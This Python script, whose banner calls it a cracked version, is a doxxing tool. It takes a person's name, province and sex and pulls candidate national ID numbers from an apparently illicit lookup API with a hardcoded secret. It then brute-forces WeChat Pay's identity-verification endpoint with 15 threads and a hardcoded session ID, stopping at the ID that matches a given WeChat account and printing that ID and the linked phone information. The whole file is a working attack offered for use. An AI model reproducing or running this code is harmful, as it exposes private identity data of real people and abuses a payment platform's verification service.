import requests
import threading
import os
import time
import sys
from queue import Queue


def print_with_delay(message, delay):
    for char in message:
        print(char, end='', flush=True)
        time.sleep(delay)
    print()


class ProgressBar:
    def __init__(self, total):
        self.total = total
        self.current = 0
        self.width = 40
        self.start_time = time.time()

    def update(self):
        self.current += 1
        percent = self.current / self.total
        filled = int(self.width * percent)
        bar = '█' * filled + '-' * (self.width - filled)
        elapsed = time.time() - self.start_time
        sys.stdout.write(f"\r[ {bar} ] {self.current}/{self.total} {percent:.1%} | {elapsed:.1f}s ")
        sys.stdout.flush()


class IDVerifier:
    def __init__(self, total):
        self.lock = threading.Lock()
        self.success_found = False
        self.success_info = {}
        self.progress = ProgressBar(total)

    def verify(self, session_id, wechat_id, id_card):
        if self.success_found:
            return True
        headers = {**BASE_HEADERS, 'x-weixin-session-id': session_id, 'Content-Length': '89'}
        data = {"login_id": wechat_id, "login_creid_tail": id_card, "login_type": 1}
        try:
            response = requests.post(API_URL, headers=headers, json=data, timeout=10)
            resp = response.json()
            base_resp = resp.get('base_resp', {})
            ret_code = base_resp.get('ret_code')
            ret_msg = base_resp.get('ret_msg')
            bind_status = resp.get('bind_status')
            with self.lock:
                self.progress.update()
                if ret_code == 0 or ret_msg == "ok" or bind_status == 0:
                    mobile_info = resp.get('mobile_info', '')
                    self.success_found = True
                    self.success_info = {'wechat_id': wechat_id, 'id_card': id_card,'mobile_info': mobile_info}
                    return True
        except:
            with self.lock:
                self.progress.update()
        return False


def worker(verifier, session_id, wechat_id, queue):
    while not queue.empty() and not verifier.success_found:
        id_card = queue.get()
        if verifier.verify(session_id, wechat_id, id_card):
            break
        queue.task_done()


def first_file_main():
    name = input("请输入姓名: ")
    province = input("请输入省市: ")
    sex = input("请输入性别: ")
    url = "http://xrese.dns.ahenan.top/api/v1/65B4A9BE43F2A8CB.php"
    params = {
        'name': name,
        'province': province,
       'sex': sex,
        'auth_secret': 'J69OYKSUPF9E4MYL'
    }
    try:
        response = requests.get(url, params=params)
        if response.status_code == 200:
            data = response.json()
            id_cards = []
            if data.get('code') == '200' and data.get('status') == 'true' and data.get('data'):
                for item in data['data']:
                    if 'id_card' in item:
                        id_cards.append(item['id_card'])
                    else:
                        print("未找到身份证信息")
            else:
                print("没有找到相关数据。")
                return []
        else:
            print(f"请求失败, 状态码: {response.status_code}")
            return []
    except requests.RequestException as e:
        print(f"请求发生错误: {e}")
        return []
    return id_cards


def new_main():
    print_with_delay("============================================", 0.01)
    print_with_delay(" (★^O^★)", 0.02)
    print_with_delay("等你有了万两金 还在乎她那片刻柔情吗", 0.05)
    print_with_delay("【宇的py】的破解V", 0.02)
    print_with_delay("============================================", 0.01)
    session_id = "1d37d1ba4c08ac5b799c9bfb7d8179c1fT79WEw2F"  # 替换
    wechat_id = input("请输入微信号: ").strip()

    # 运行第一份文件获取身份证信息
    id_cards = first_file_main()

    if not id_cards:
        print("未获取到有效的身份证号,无法进行核验。")
        return

    verifier = IDVerifier(len(id_cards))
    queue = Queue()
    for id_card in id_cards:
        queue.put(id_card)
    print(f"\n开始核验 {len(id_cards)} 个身份证...\n")
    threads = []
    for _ in range(15):
        t = threading.Thread(target=worker, args=(verifier, session_id, wechat_id, queue))
        t.start()
        threads.append(t)
    try:
        for t in threads:
            t.join()
    except KeyboardInterrupt:
        print("\n用户中断操作")
        return
    elapsed = time.time() - verifier.progress.start_time
    if verifier.success_found:
        print("\n\n" + "=" * 44)
        print(f"微信号:{verifier.success_info['wechat_id']}")
        print(f"身份证:{verifier.success_info['id_card']}")
        print(f"手机号信息: {verifier.success_info['mobile_info']}")
        print("状态:核验一致 ✅")
        print(f"\n用时: {elapsed:.1f}s | 测试: {verifier.progress.current}/{len(id_cards)}")
        print("=" * 44)
    else:
        print(f"\n\n所有身份证核验完成,未找到匹配")
        print(f"用时: {elapsed:.1f}s | 总数: {len(id_cards)}")


if __name__ == '__main__':
    BASE_HEADERS = {
        'Host': 'wx.tenpay.com',
        'x-weixin-apple-session': '1b94c1763a7a473b82ddf1199fea88a7',  # 替换
        'Accept': '*/*',
        'Sec-Fetch-Site': 'same-origin',
        'x-weixin-bind-entry': 'bind_in_safari_tmpl',
        'Accept-Language': 'zh-CN,zh-Hans;q=0.9',
        'Accept-Encoding': 'gzip, deflate, br',
        'Sec-Fetch-Mode': 'cors',
        'Content-Type': 'application/json; charset=UTF-8',
        'Origin': 'https://wx.tenpay.com',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15',
        'Referer': 'https://wx.tenpay.com/',
        'Connection': 'keep-alive',
        'Sec-Fetch-Dest': 'empty'
    }
    API_URL = 'https://wx.tenpay.com/apple/apl_verifyuserinfo'
    new_main()
